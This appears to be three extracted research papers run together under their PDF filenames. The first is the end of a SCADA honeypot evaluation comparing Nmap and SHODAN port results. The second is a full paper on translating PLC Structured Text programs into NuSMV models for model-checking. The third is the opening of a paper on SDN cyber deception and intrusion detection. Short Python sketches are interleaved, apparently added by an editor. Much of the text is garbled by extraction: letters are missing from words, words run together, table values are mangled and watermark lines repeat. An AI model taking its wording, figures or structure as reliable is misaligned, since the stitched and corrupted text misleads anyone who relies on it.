SHODAN focuses its scan results on a much smaller port set, which resulted in the results not showing the large number of open ports that were shown in the all-port scan of Nmap. 
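One way to operationalise this comparison is to diff each scan result against the ports the corresponding Conpot template is expected to expose (the "Ports Opened by Conpot" columns in Tables II-V): SCADA ports that go undetected and unexpected extra ports are both worth flagging. A small sketch follows; the port sets are copied from the tables above and the function name is ours.

# Sketch: compare observed open ports with the ports a Conpot template is
# expected to expose, to spot both undetected SCADA ports and extra ports
# that could betray the honeypot.

EXPECTED_CONPOT_PORTS = {
    "Siemens S7-200": {80, 102, 161, 502, 623, 47808},
    "Guardian AST": {10001},
    "IPMI": {623},
    "Kamstrup smart meter": {1025, 50100},
}

def port_diff(template, observed):
    """Return (undetected SCADA ports, unexpected open ports)."""
    expected = EXPECTED_CONPOT_PORTS[template]
    return expected - observed, observed - expected

# Full-range Nmap result for the Siemens template (Table IV).
observed = {22, 80, 102, 502, 514, 2000, 5060, 8008, 8020, 18556}
undetected, unexpected = port_diff("Siemens S7-200", observed)
print("SCADA ports not detected:", sorted(undetected))       # [161, 623, 47808]
print("ports that may betray the host:", sorted(unexpected))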
The most intriguing finding here, as previously mentioned, is that SHODAN found port 161 open on the Siemens device, while Nmap did not. The banner grabbed by SHODAN also showed that the device was a Siemens SIMATIC S7-200 device. These findings suggest that Nmap is not fully effective in determining which ports are actually open. Unfortunately, at the time of this writing, SHODAN had not discovered the IPMI and Kamstrup devices, so a comparison of the SHODAN results for these devices with the Nmap port scans was not available. Additional future work includes evaluating the SCADA Honeynet honeypot, analyzing SCADA honeypot attacks, and evaluating log analysis tools. Another future task is to cloak honeypot signatures that could differentiate them from real SCADA devices and then evaluate attack differentials, which could help determine whether honeypots are being identified. In conclusion, the devices accurately depicted SCADA ports, but appeared to have additional ports open that could reveal their identity as honeypots to sophisticated attackers.

REFERENCES
[1] S. Wade, "SCADA Honeynets: The attractiveness of honeypots as critical infrastructure security tools for the detection and analysis of advanced threats," Graduate Theses and Dissertations, Iowa State University, USA, 2011.
[2] A. Serbanescu, S. Obermeir, and Der-Yeuan Yu, "ICS Threat Analysis Using a Large-Scale Honeynet," in Proceedings of the 3rd International Symposium for ICS & SCADA Cyber Security Research 2015, 2015, pp. 1-30.
[3] D. Buza, F. Juhasz, and G. Miru, "Design and implementation of critical infrastructure protection system," Budapest University of Technology and Economics, Department of Networked Systems and Services, 2013.
[4] D. Fronimos, E. Magkos, and V. Chrissikopoulos, "Evaluating Low Interaction Honeypots and On their Use against Advanced Persistent Threats," in PCI '14, Proceedings of the 18th Panhellenic Conference on Informatics, Athens, Greece, October 2-4, 2014.
Efficient_representation_for_formal_verification_of_PLC_programs.pdf
This paper addresses the scalability of model-checking using the NuSMV model-checker. To avoid, or at least limit, combinatory explosion, an efficient representation of PLC programs is proposed. This representation includes only the states that are meaningful for properties proof. A method to translate PLC programs developed in Structured Text into NuSMV models based on this representation is described and exemplified on several examples. The results (state space size and verification time) obtained with models constructed using this method are compared to those obtained with previously published methods, so as to assess the efficiency of the proposed representation.
* This work was carried out in the frame of a research project funded by Alstom Power Plant Information and Control Systems, Engineering Tools Department.
I. INTRODUCTION
Formal verification of PLC (Programmable Logic Controller) programs thanks to model-checking tools has been addressed by many researchers ([1], [2], [3], [4], [5], [6], [7], [8]). These works have yielded formal semantics of the IEC 61131-3 standardized languages [9] as well as rules to translate PLC programs into formal models that can be taken as inputs of model-checkers such as SMV [10] or UPPAAL [11]. Despite these valuable results, it is easy to observe that model-checking is not employed daily in companies that develop PLC programs (see [12] for a comprehensive study of logic design practices). Automation engineers prefer to use the traditional, while tedious and not exhaustive, simulation techniques to verify that the programs they have developed fulfill the application requirements. Several reasons can be put forward to explain this situation: specifying formal properties in temporal logic or in the form of timed automata is an extremely tough task for most engineers; model-checkers provide, in case of negative proof, counterexamples that are difficult to interpret; PLC vendors do not propose commercial software able to translate PLC programs automatically into formal models, etc. All these difficulties are real and solutions must be found to overcome them, e.g. libraries of application-oriented properties, explanations of counterexamples in suitable languages, automatic translation software. Nevertheless, in our view, the main obstacle to industrial use of formal verification is the combinatory explosion that occurs when dealing with large-size control programs. The formal models that underlie model-checking are indeed discrete state models such as finite state machines or timed automata. Even if properties are proved symbolically, using binary decision diagrams (BDDs) for instance, existing methods produce, from industrial, large-size PLC programs, models that include too many states to be verified by present model-checking tools. In that case, no proof can be obtained and formal verification is then useless. The aim of the research presented in this paper is to tackle, or at least to lessen, this problem by proposing a translation method that yields, from PLC programs, formal models far smaller than those obtained with existing methods. These novel models will include only the states that are meaningful for properties proof and will thus be less sensitive to combinatory explosion. This efficient representation of PLC programs will contribute to improving the scalability of model-checkers and to favoring their industrial use. This paper includes five sections. Section 2 delineates the frame of our research. The principle of the translation method is explained in section 3.
Section 4 describes how ef cientNuSMV models can be obtained from PLC programs de-veloped in a standardized language thanks to this method,while section 5 presents experimental results. Prospects forextending these works are given in section 6. PLCs (Figure 1) are automation components that receive logic input signals coming from sensors, operators or otherPLCs and send logic output signals to actuators or othercontrollers. The control algorithms that specify the valuesof outputs according to the current values of inputs and the previous values of outputs are implemented within PLCs in programs written in standardized languages, such as LadderDiagram (LD), Structured Text (ST) or Instruction List (IL).These programs run under a real-time operating systemwhose scheduler may be multi- or mono-task. This paperfocuses only on mono-task schedulers. Given this restriction, a PLC performs a cyclic task, termed PLC cycle, that includes three steps : inputs reading, program execution,outputs updating. The period of this task may be constant(periodic scan) or may vary (cyclic scan). II. M ODEL -CHECKING OF LOGIC CONTROLLERS Previous works that have been carried out to check PLC programs properties by using existing model-checkers ad-dressed either timed ([4], [7]) or untimed ([1], [2], [3],[6], [8]) model-checking. Since our objective is to facilitateindustrial use of formal veri cation techniques by avoiding orlimiting combinatory explosion and that this objective seemsmore easily reachable for untimed systems, only untimedProceedings of the 8th InternationalWorkshop on Discrete Event SystemsAnn Arbor, Michigan, USA, July 10-12, 2006 TA2.2 1-4244-0053-8/06/$20.00 2006 IEEE 182 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:09 UTC from IEEE Xplore. Restrictions apply. Fig. 1. PLC basic components model-checking will be considered in this paper. In what follows, all examples of formal models will use the syntax of the NuSMV model-checker [13], though similar resultswould be obtained with that of other model-checkers of thesame class. It matters also to point out that, given the kind ofsystems that are considered, periodic and cyclic tasks behavein the same fashion: PLC cycle duration is meaningless. Several approaches have been proposed to translate a PLC program into a formal untimed model. For room reasons,only two of them will be sketched below. [14] for instanceexpresses the semantics of each element (contact, coil,links,...) of LD in the form of a small state automaton.The formal behavior of a given program is then obtainedby composition of the different state automata that describeits elements. This method relies upon a detailed semanticsof ladder diagram and can be extended to programs writtenin several languages, but it gives rise easily to state spaceexplosion, even for rather small examples. A more ef cientapproach ([2], [6]) translates each program statement into aSMV next function. Each PLC cycle is then modeled by a sequence of states, the rst and last states being characterizedrespectively by the values of input-output variables at theinput reading and output updating steps, the intermediarystates by the values of these variables after execution of eachstatement. Figure 2 illustrates this method on a didactic example written in ST. Thorough this paper, PLC programs exampleswill be given in ST. 
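To make the size of these traces concrete, the sketch below executes one scan cycle of a small three-statement program and records a state after every statement, as the per-statement translation does; the proposed representation would keep only the last of these states. The toy program and its names are ours and merely stand in for the didactic example of Fig. 2.

# Sketch: one PLC scan cycle of a toy program, recording the variable
# valuation after every statement (the per-statement model of [6]) versus
# keeping only the end-of-cycle state (the proposed representation).

def scan_cycle(inputs, outputs):
    state = {**inputs, **outputs}
    statements = [
        lambda s: s.update(O1=s["I1"] or s["I2"]),
        lambda s: s.update(O2=s["I3"] and not s["I4"]),
        lambda s: s.update(O3=s["O1"] and s["O2"]),
    ]
    trace = []
    for stmt in statements:
        stmt(state)
        trace.append(dict(state))       # one state per executed statement
    return trace

trace = scan_cycle({"I1": True, "I2": False, "I3": True, "I4": False},
                   {"O1": False, "O2": False, "O3": False})
print("states recorded by the per-statement model:", len(trace))
print("state kept by the proposed representation:", trace[-1])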
ST is a a textual language, similarto PASCAL, but tailor-made for automation engineers, forit includes statements to invoke and to use the outputs ofFunction Blocks (FB) such as RS (SR) - reset (set) dominantmemory -, RE (FE) - rising (falling) edge. This languageis advocated for the control systems of power plants thatare targeted in the project. Equivalent programs in othersequentially executed languages, like programs written in ILor LD, can be obtained without dif culty. The program presented in Figure 2 includes four state- ments: two assignments followed by one IF selection and one assignment. From this program, it is possible to obtainby using the previous method (translation of each statementinto a SMV next function) an execution trace whose part is shown on Figure 2, assuming that the values of the variablesin the initial state (de ned when setting up the controller) and the values of the input variables at the inputs reading steps of the rst and second PLC cycles are respectively: Initial values of variables: I1=1,I2=0,I3=1, I4=0,O1=0,O2=0,O3=0 and O4=1 Input variables values at the beginning of the rst PLC cycle: I1=0,I2=0,I3=1 and I4=1 Input variables values at the beginning of the second PLC cycle: I1=1,I2=1,I3=0 and I4=1 It matters to highlight that the values of input variables remain constant in all the states of one PLC cycle. Fig. 2. A simple program and part of the resulting trace with the method presented in [6] In addition to the formal model of the controller, model- checkers need a set of formal properties to prove. Two kindsof properties are generally considered: Intrinsic properties, such as absence of in nite loop,no deadlock, ..., which refer to the behavior of thecontroller independently of its environment; Extrinsic properties which refer to the behavior of inputsand outputs, e.g. commission of outputs for a givencombination of inputs, always forbidden combinationof outputs, allowed sequences of inputs-outputs,... This paper focuses only on extrinsic properties. Referring to outputs behavior, these properties impact indeed directlysafety and dependability of the controlled process and thenare more crucial. If one of them (or several) are not satis ed,hazardous events may occur, leading to signi cant failures. If focus is put on extrinsic properties veri cation, the two approaches described above lead to state automata withnumerous states that are not meaningful. It can be seen indeed on Figure 2 that the intermediary states de ned for each statement are not useful in that case; extrinsic properties 183 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:09 UTC from IEEE Xplore. Restrictions apply. are related only to the values of input-output variables when updating the outputs, i.e. at the end of the PLC cycle. A similar reasoning may be done for the other method. Hence ef cient representation for formal veri cation will include only the states describing the values of input-outputvariables when updating outputs (shaded states in Figure 2).This representation may be obtained directly from a PLC pro-gram by applying the method whose principle is explainedin the next section. III. M ETHOD PRINCIPLE A. 
Assumptions In what follows it is assumed that: PLC programs are executed sequentially; only Boolean variables are used; internal variables may be included in the program; only the Boolean operators de ned in IEC 61131-3 standard (NOT, AND, OR, XOR) are allowed; only the following statements of ST language are al-lowed: assignment, function and function block (FB)control statements, IF and CASE selection statements;iteration statements (FOR, WHILE, REPEAT) are for-bidden; multiple assignments of the same variable are possible; Boolean FBs, such as set and reset dominant memoriesde ned in the standard or FBs that implement appli-cation speci c control rules, like actuators starting orshutting down sequences, may be included in a program. The rst two assumptions are simple and can be made for programs in ST, LD or IL. The third assumption meansthat a program computes the values of internal and output variables from those of input variables and of computed (internal and output) variables; this allows us to considerinternal variables in the same way as outputs in what follows.The fourth and fth ones apply only to ST programs butsimilar assumptions for LD or IL programs can be easily drawn up. Iterations are forbidden because they can lead to too long cycle times that do not comply with real-timerequirements. The sixth assumption may be puzzling, forcontrary to the usual programming rule that advocates thateach variable must be assigned only once. Even if thisprogramming rule is helpful when developing a softwaremodule from scratch, this assumption must be introducedto cope with industrial PLC programs in which it is quiteusual to nd multiple assignments of the same variable.Two reasons can be put forward to explain this situation.First industrial PLC programs are often developed fromprevious similar ones; then programs designers copy and paste parts of previous programs in the new program. This reuse practice may lead to assign one variable several times.Second a ST program may contain both normal assignmentsand assignments included within selection statements; thisis an other reason that explains multiple assignments. Asour objective is to proof properties on existing programs, without modifying them prior to veri cation, this speci c feature must be taken into account. It will be shown belowthat multiple assignments do not impede to construct ef cient representation. Figure 3 outlines the translation method that has been developed to obtain ef cient representation of PLC programs.As shown on this gure, this method includes two main steps:static analysis of the program and generation of the NuSMVmodel that describes formally the behavior of the programwith regards to its inputs-outputs. Fig. 3. Method overview B. Static analysis Static analysis is aiming at deriving, from the PLC pro- gram, dependency relations between variables. Starting fromthe initial values of input and output variables that are xedduring set up, for each PLC cycle, the values of outputvariables are computed either only from values of inputvariables or from values of input variables and values of otheroutput variables. 
In the rst case, the value of each outputvariable at the end of PLC cycle i+1 (i: positive integer) isobtained merely from values of input variables for this cycle.In the second case, computation of the value of one outputvariable must use the values of output variables for this cycleif the last assignment of these output variables is locatedupstream in the program, or the values of output variablesat the previous PLC cycle (cycle i) if those variables areassigned downstream; this computation will use obviouslythe values of input variables for cycle i+1. Hence, the mainobjective of static analysis is to determine, for each outputvariable, whether the value of each variable involved incomputation of the value of this output variable at PLC cyclei+1 is related to PLC cycle i+1 or to PLC cycle i. Static analysis is exempli ed on the program given in Figure 4. This ST program computes the values of ve outputvariables ( O 1, ..., O5) from those of four input variables ( I1, ..., I4) and includes only allowed statements. Some speci c features of this example are to be highlighted: the IF statement does not specify the value of O3if the condition following the IF is not true; this is allowed inST language and means that the value of O 3remains the same when this condition is false; the assignment of O4uses the output of a RS (reset dominant memory) FB; one output variable ( O1) is assigned twice. Scanning sequentially the program from top to bottom, statement by statement, static analysis yields dependencyrelations represented graphically in Figure 5 a). In this gure, 184 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:09 UTC from IEEE Xplore. Restrictions apply. an arrow from variable X to variable Y means that the value of Y depends on the value of X (or that the value of X is used to compute the value of Y). Each statement gives rise to one dependency relation. For instance, the dependency relationobtained from the rst statement means that the value of O 1 depends on the values of I1and I2, the third relation that the value of O3is computed from the values of I3,I4,O1, and O3itself (in case of false condition), the fourth relation that the value of O4is computed from the values of I1,O5, and O4itself (if the two inputs of a memory are false, the output stays in its previous state),.... From this rst set ofrelations, it is then possible to build an other set of moredetailed relations such as: there is only one dependency relation for each outputvariable (multiple assignments are removed); dependency relations are developed, if possible; the value of each output variable Oj(j: positive integer) at PLC cycle i+1, noted Oj,i+1, is obtained from values of input variables for this cycle, noted Ik,i+1(k: positive integer), and from values of output variables for thiscycle ( O j,i+1) or for the previous one ( Oj,i). This second set of relations is presented in Figure 5b). Only the relation coming from the latter assignment of O1has been kept. The rst relation of the previous relations set has nevertheless permitted to obtain the nal dependency relationofO 3: the value of this variable at cycle i+1 is obtained from the values of I1,I2,I3,I4for cycle i+1 and the value of O3 at cycle i. 
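The sketch below replays this static analysis on the program of Fig. 4: it scans the assignments in program order and, for every variable read, records whether the reference is to cycle i+1 (an input, or an output already assigned upstream) or to cycle i (an output assigned downstream, or not yet assigned in this cycle). The flattened program encoding and the function names are ours, and the relations are not further developed by substitution as they are in Fig. 5 b).

# Static analysis sketch for the Fig. 4 program: tag every variable read with
# the PLC cycle it refers to ("i+1" for the current cycle, "i" for the
# previous one). Inputs always belong to the current cycle; outputs do only
# if their last assignment is upstream of the reading statement.

PROGRAM = [                       # (assigned variable, variables read)
    ("O1", ["I1", "I2"]),
    ("O2", ["I3", "I4"]),
    ("O3", ["O1", "I3", "I4", "O3"]),   # O3 keeps its value when the IF condition is false
    ("O4", ["O5", "I1", "O4"]),         # RS memory: output also depends on its own state
    ("O5", ["O2", "O4"]),
    ("O1", ["I2", "I4"]),               # second assignment of O1
]
INPUTS = {"I1", "I2", "I3", "I4"}

def dependency_relations(program):
    relations, assigned_upstream = {}, set()
    for target, reads in program:
        relations[target] = [
            (var, "i+1") if var in INPUTS or var in assigned_upstream else (var, "i")
            for var in reads
        ]                                   # a later assignment overwrites the earlier one
        assigned_upstream.add(target)
    return relations

for output, deps in dependency_relations(PROGRAM).items():
    print(output, "<-", deps)
# e.g. O4 <- [('O5', 'i'), ('I1', 'i+1'), ('O4', 'i')]
#      O5 <- [('O2', 'i+1'), ('O4', 'i+1')]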
The computation of the value of O4at cycle i+1 uses the value of O5at cycle i for this variable is assigned after O4in the program whilst the value of O5at cycle i+1 is computed from the values of O2and O4at this same cycle because these two variables have been assigned upstream inthe program. This set of dependency relations involving the values of output variables for two successive PLC cycles permits to translate ef ciently PLC programs into NuSMV models asexplained in the next section. O1:=I1OR I 2; O2:=I3AND I 4; IF O 1 THEN O3:=I3AND NOT (I4); END IF; O4:=RS (O5,I1) O5:=O2AND O 4; O1:=NOT (I2OR I 4); Fig. 4. PLC program example IV . T RANSLATING STPROGRAMS INTO NUSMV MODELS It is assumed in this section that the reader has a basic knowledge of the model-checker NuSMV; readers who wantto know more on this proof tool can refer to [13]. To checka system, NuSMV takes as input a transition relation thatspecify the behavior of a Finite State Machine (FSM) whichis assumed to represent this system. The transition relation of the FSM is expressed by de ning the values of variables in Fig. 5. Dependency relations obtained by static analysis. a) ordered intermediate relations; b) nal relations the next state (i.e. after each transition), given the values of variables in the current state (i.e. before the transition) and isdescribed in a declarative form as a set of assignments. Eachassignment de nes the next value of one variable from anexpression that includes operands that are values of variablesin the next or in the current state, and operators. As onlyBoolean variables are used in this study, the only Booleanoperators NOT, AND, OR, noted respectively !,& , |will be employed below. A. Translation algorithm Each ST statement that gave rise to one of the nal depen- dency relations is translated into one NuSMV assignment; then useless ST statements (assignments that are cancelled by other upstream assignments) are not translated. The setof useful statements is noted Prin what follows. The values of the variables within one assignment are obtained from thecorresponding dependency relation. If the value of a variablein this relation is that at PLC cycle i+1, then the next value of this variable will be introduced in the corresponding NuSMV assignment, using the next function; if the dependency relation mentions the value at cycle i, then the correspondingNuSMV assignment will employ the current value of thevariable. Given these translation rules, the translation algorithm described Figure 6 has been developed. This algorithm yieldsa NuSMV model from a set of statements Prissued from a PLC program. 185 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:09 UTC from IEEE Xplore. Restrictions apply. BEGIN PLC prog TONuSMV model( Pr) FOR each statement SiofPr: IFSiis an assignment ( Vi:=expression i) THEN FOR each variable Vkinexpression i: Replace Vkby the variable pointed out in the dependency graph ( Vk,iorVk,i+1) ELIF Siis a conditional structure (if cond ; then stmt 1; else stmt 2) FOR each variable Vkincond : Replace Vkby the variable pointed out in the dependency graph ( Vk,iorVk,i+1) FOR each variable Vmassigned in Si: Replace Vmassignment by: case cond : assignment of Vmin PLC prog TONuSMV model( stmt 1)/follows; !cond : assignment of Vmin PLC prog TONuSMV model( stmt 2)/follows; esac ; Fig. 6. Translation algorithm B. 
Taking into account Function Blocks If a ST assignment includes an expression involving a Boolean Function Block (FB), the behavior of this FB mustbe detailed in the corresponding NuSMV assignment. Hencea library of generic models describing in NuSMV syntaxthe behavior of the usual FBs has been developed. Whentranslating ST assignments that include instances of FBs, instances of these generic models will be introduced into theNuSMV assignments. The RS (reset dominant memory) FB, for instance, has two inputs, noted Set and Reset, and oneoutput Q. Its behavior is recalled below: If Reset is true, then Q is false; If Set is true and Reset false, then Q is true; If none of the inputs is true, then Q keeps its previousvalue. This FB can be translated into the generic following NuSMV case...esac structure, sequentially executed. Next (Q): = case Reset :0 ; Set :1 ; 1: Q; esac ; C. Example Next (I1): ={0,1}; Next (I2): ={0,1}; Next (I3): ={0,1}; Next (I4): ={0,1}; Next (O2): = Next (I3)& Next (I4); Next (O3): = case Next (I1)|Next (I2): Next (I3)&! ( Next (I4)); !(Next (I1)|Next (I2)) : O3; esac ; Next (O4): = case Next (I1):0 ; O5:1 ; 1: O4; esac ; Next (O5): = Next (O2)& Next (O4); Next (O1): = ! ( Next (I2)|Next (I4)); Fig. 7. NuSMV model of the program presented in Figure 4Using the algorithm of Figure 6, the NuSMV model presented in Figure 7 can be obtained from the program of the previous section. It matters to emphasize that the translation algorithm does not introduce auxiliary variables, such as line counter, endof cycle, unlike the method proposed in [6]. It remainsnevertheless to assess the ef ciency of this representation. V. A SSESSMENT OF THE REPRESENTATION EFFICIENCY Several experiments have been carried out to assess ef- ciency of the representation proposed in this paper. To facilitate these experiments, an automatic translation program based on the method presented in the previous sections hasbeen developed. A. First experiment The objective of this experiment was to compare, on the simple example of Figure 4, the sizes of the state spacesof the NuSMV models obtained with the representationproposed in [6], i.e. direct translation of each statement ofthe PLC program into one NuSMV assignment, and withthat presented in this paper. Reachable states System diameter representation of [6] 314 out of 14336 22 proposed representation 21 out of 512 2 TABLE I STATE SPACE SIZES OF THE PROGRAM PRESENTED IN FIGURE 4 The two NuSMV models have been rst compared, using behavioral equivalence techniques, so as to verify that theybehave in the same manner. This comparison gave a positiveresult: the sequence of outputs generated by the two modelsis the same whatever the sequence of inputs. Then the sizes of their state spaces have been computed, using the NuSMVforward check function, as shown in Table I. This table contains, for each representation, the number of reachablestates among the possible states, e.g. 314 among 14336means that 314 states are really reachable among the 14336possible, as well as the system diameter: minimum number ofiterations of the NuSMV model to obtain all the reachablestates. These results shows clearly that, even for a simpleexample, the proposed representation reduces the size of thestate space by roughly one order of magnitude. B. Second experiment The second experiment was aiming at assessing the gains in time and in memory size, if any, due to the new rep-resentation when proving properties. 
This experiment hasbeen performed using the test-bed example presented in [6]: controller of a Fischertechnik system, for which numerical results were already available. Once again two models havebeen developed and the same properties have been checkedon both. Table II gives duration and memory consumption ofthe checking process for two properties. These results were obtained by using NuSMV , version 2.3.1, on a PC P4 3.2GHz, with 1 GB of RAM, under Windows XP. 186 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:09 UTC from IEEE Xplore. Restrictions apply. representation of [6] proposed representation liveness property 5h / 526MB 2s / 8MB safety property 20min / 200MB 2s / 8MB TABLE II TIME AND MEMORY REQUIRED FOR PROPERTIES VERIFICATION This experiment shows that the proposed representation reduces signi cantly the veri cation time and the mem-ory consumption. The ratio between the veri cation timesobtained with the two representations, for instance, varies between 9000 and 600, depending on the property. Similarresults are obtained with the other properties. C. Third experiment This third experiment has been performed with industrial programs developed for the control of a thermal power plant.The control system of this plant comprises 175 PLCs con-nected by networks. All the programs running on these PLCshave been translated as explained previously. The objective ofthis experiment was merely to assess the maximum, mediumand minimum sizes of the state spaces of the models obtainedfrom this set of industrial programs when using the proposedrepresentation. These values are given on the fourth line ofTable III. Even if the sizes of the state spaces are verydifferent, this experiment shows clearly the possibility oftranslating real PLC programs without combinatory explo-sion. Moreover these state spaces can be explored by themodel-checker in a reasonable time, a mandatory conditionfor checking properties; only 8 seconds are necessary indeedto explore all the state spaces of these programs. A secondaryresult is given at the last line of this table; the translationtime, time necessary to obtain from the set of programs a setof NuSMV models in the presented representation complieswith engineering constraints; translation of one PLC programinto one NuSMV model will not slow down PLC programdesign process. Number of programs 175 Output variables max:47 min:1 sum:1822 Input variables max:50 min:2 sum:2329 State space size of each program max:8.1028min: 105mean:5.1026 Strutation time of all state spaces 8 sec Whole time for translation 50 sec TABLE III RESULTS FOR A SET OF INDUSTRIAL PROGRAMS Even if it is not possible to obtain from these three experiments de nitive numerical conclusions, such as statespace reduction rate, veri cation time improvement ratio, ...they have allowed to illustrate the bene ts of the proposedrepresentation on a large concrete example, coming fromindustry. VI. C ONCLUSION The representation of PLC programs proposed in this pa- per can contribute to favor dissemination of model-checkingtechniques, for it enables to lessen strongly state space explosion problems and to reduce veri cation time. The examples given in the paper were written in ST language. Nevertheless programs written in LD or in IL languagescan be represented in the same manner; the principle of thetranslation method is the same, only the translation rules ofstatements are to be modi ed. 
Ongoing works concern an extension of this representation to take into account integer variables and the developmentof a similar representation for timed model-checking. R EFERENCES [1] I. Moon, Modeling programmable logic controllers for logic veri ca- tion, in Control Systems Magazine, IEEE . IEEE Comp. Soc. Press, 1994, pp. 53 59. [2] M. Rausch and B. Krogh, Formal veri cation of PLC programs, in Proc. of American Control Conference , June 1998, pp. 234 238. [3] R. Huuck, B. Lukoschus, and N. Bauer, A model-checking approach to safe SFCs, in Proc. of CESA 2003 , July 2003. [4] B. Zoubek, Automatic veri cation of temporal and timed properties of control programs, Ph.D. dissertation, University of Birmingham, 2004. [5] G. Frey and L. Litz, Formal methods in PLC programming, in Proc. of the IEEE SMC 2000 , October 2000, pp. 2431 2436. [6] O. de Smet and O. Rossi, Veri cation of a controller for a exible manufacturing line written in ladder diagram via model-checking, inAmerican Control Conference, ACC 02 , May 2002, pp. 4147 4152. [7] H. Bel Mokadem, B. B erard, V . Gourcuff, J.-M. Roussel, and O. de Smet, Veri cation of a timed multitask system with Uppaal, in Proc. of ETF A 05 . Catania, Italy: IEEE Industrial Electronics Society, Sept. 2005, pp. 347 354. [8] F. Jim enez-Fraustro and E. Rutten, A synchronous model of IEC 61131 PLC languages in SIGNAL. in ECRTS , 2001, pp. 135 142. [9] IEC Standard 61131-3 : Programmable controllers - Part 3 , IEC (International Electrotechnical Commission), 1993. [10] K. L. McMillan, The SMV Language , Cadence Berkeley Labs, http://www-cad.eecs.berkeley.edu/ kenmcmil/language.ps. [11] J. Bengtsson, K. Larsen, F. Larsson, P. Pettersson, and W. Yi, UP- PAAL a tool suite for automatic veri cation of real-time systems, inProc. Workshop Hybrid Systems III: V eri cation and Control, New Brunswick, NJ, USA, Oct. 1995 , ser. Lecture Notes in Computer Science, vol. 1066. Springer, 1996, pp. 232 243. [12] M. R. Lucas and D. M. Tilbury, A study of current logic design practices in the automotive manufacturing industry, Int. J. Hum.- Comput. Stud. , vol. 59, no. 5, pp. 725 753, 2003. [13] A. Cimatti, E. Clarke, E. Giunchiglia, F. Giunchiglia, M. Pistore, M. Roveri, R. Sebastiani, and A. Tacchella, NuSMV Version 2: An OpenSource Tool for Symbolic Model Checking, in Proc. Interna- tional Conference on Computer-Aided V eri cation (CA V 2002) , ser. LNCS, vol. 2004. Copenhagen, Denmark: Springer, July 2002. [14] O. Rossi, Validation formelle de programmes ladder diagram pour automates programmables industriels (formal veri cation of PLC pro-gram written in ladder diagram), Ph.D. dissertation, ENS de Cachan, 2003. 187 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:09 UTC from IEEE Xplore. Restrictions apply.
Efficient representation for formal verification of PLC programs* Vincent Gourcuff, Olivier De Smet and Jean-Marc Faure. LURPA, ENS de Cachan, 61 avenue du Prés. Wilson, F-94235 Cachan Cedex, France. Email: {gourcuff, de smet, faure}@lurpa.ens-cachan.fr
Fool_Your_Enemies_Enable_Cyber_Deception_and_Moving_Target_Defense_for_Intrusion_Detection_in_SDN.pdf
The adoption of deception technology, built to throw stealthy attackers off real assets and gather intelligence about how they operate, is gaining ground in network systems. In addition, static honeypots are deployed in the network to attract adversaries and keep them away from the real targets. However, this can disclose the existence of cyber traps in the network, which will not fool skillful attackers. Meanwhile, many intrusion detection systems (IDS) lack the abnormal traffic samples needed to obtain knowledge of cyberattacks. Hence, it is vital to make honeypots more dynamic and to use them as material for harvesting useful threat intelligence for the detector. Taking advantage of Software Defined Networking (SDN), cyber traps can be easily deployed when an intrusion detector triggers, or actively laid in advance, to mitigate the impact of adversaries on real assets. Instead of building the IDS separately or blocking attacks promptly after an alert is issued, in this paper we utilize the strategy of associating Cyber Deception and Moving Target Defense (MTD) with IDS in SDN, named FoolYE (Fool your enemies), to slow a network intruder down and leverage the behaviors of adversaries on traps to feed back into detector awareness.
Fool Your Enemies: Enable Cyber Deception and Moving Target Defense for Intrusion Detection in SDN. Phan The Duy a,b, Hien Do Hoang a,b, Nghi Hoang Khoa a,b, Do Thi Thu Hien a,b, Van-Hau Pham a,b. a Information Security Laboratory, University of Information Technology, Hochiminh City, Vietnam. b Vietnam National University Ho Chi Minh City, Hochiminh City, Vietnam. {duypt, hiendh, khoanh, hiendtt, haupv}@uit.edu.vn

Keywords: cyber deception, SDN, software defined networking, intrusion detection, honeypot

I. INTRODUCTION

Witnessing the explosion of Internet of Things (IoT) devices, network management encounters problems of lacking flexibility, scalability, and automation. Under a conventional network architecture, the performance of the network is degraded when there is fluctuation in the presence of, and communication among, many heterogeneous devices. To this end, Software Defined Networking (SDN) has been emerging with outstanding features to effectively manage a diversity of devices for edge-cloud computing through a centralized controller [1]. It enables the network administrator to observe a global view of the entire topology, automatically deploy virtual network functions, and promptly push new security policies to IoT devices [2]. Clearly, SDN is a promising network paradigm for security orchestration in a large-scale network. When flowing through security sensors, the network traffic can be processed in a flexible way by rules installed in OpenFlow switches to intercept malicious actions.

In The Art of War [3], the most important and most famous military treatise in Asia for the last two thousand years, Sun Tzu observes: "All warfare is based on deception. Hence, when we are able to attack, we must seem unable; when using our forces, we must appear inactive." Nowadays, some 2,500 years later, deception can still be efficiently applied in the war on cybercrime, in addition to modern military operations. Deception is a great way to gain information about the opponent [4]. Though there are many security approaches, such as firewalls and intrusion detection systems, for recognizing rogue actors and preventing them from accessing critical resources, they are still not active defense solutions. Instead of waiting for attackers to intrude into the network and then promptly blocking them, cyber deception technology, known as a next generation of honeypots, is adopted to pose as real network resources and lure hackers. With this proactive strategy, cyber traps and decoy systems are deployed at several locations in the network to consume the effort and time of attackers.

Besides, Moving Target Defense (MTD), an active defense principle, keeps changing the attack surface of a protected asset through a dynamic shifting strategy handled by the administrator. In this way, the attack surface exposed to attackers appears chaotic and unstable, because network configurations are actively changed over time [5]. In different use cases, MTD can be applied to various asset attributes, including IP address, running services, protocol, topology, or port number [6]. Moreover, to mitigate the harm of attacks, an IDS is considered an essential means in the first line of the defender system.
By collecting malicious traces from various network segments, devices, or security sensors, these systems not only allow recognizing and disrupting incoming actions from attackers, but also provide the capability of detecting likely malicious traffic in the future. This is achieved by using machine learning (ML) for anomaly detection in addition to the signature-based approach. The complement of these two approaches can give a more effective defender system for a network that constantly suffers sophisticated attacks by skilled hackers. Unfortunately, such ML-based IDSs need to be trained with a large volume of diverse attack records, which are labeled during the analysis phase by security experts. The labeling task requires human effort and time, which is nearly impossible in the context of big data. The more sophisticated attacks emerge, the more burdensome the task of gathering attack trails becomes. Additionally, some attack types are difficult to perform in a real-life scenario on the local network for collection purposes due to resource limitations. Therefore, instead of blocking attackers right after they set foot in the network, we can continuously observe and extract their behaviors for training the ML-based IDS. These decoy systems and cyber traps are free sources for defender systems to understand the hackers, while still keeping the enemy stuck in a matrix of vulnerabilities of fake assets, consuming time and effort in the reconnaissance phase.

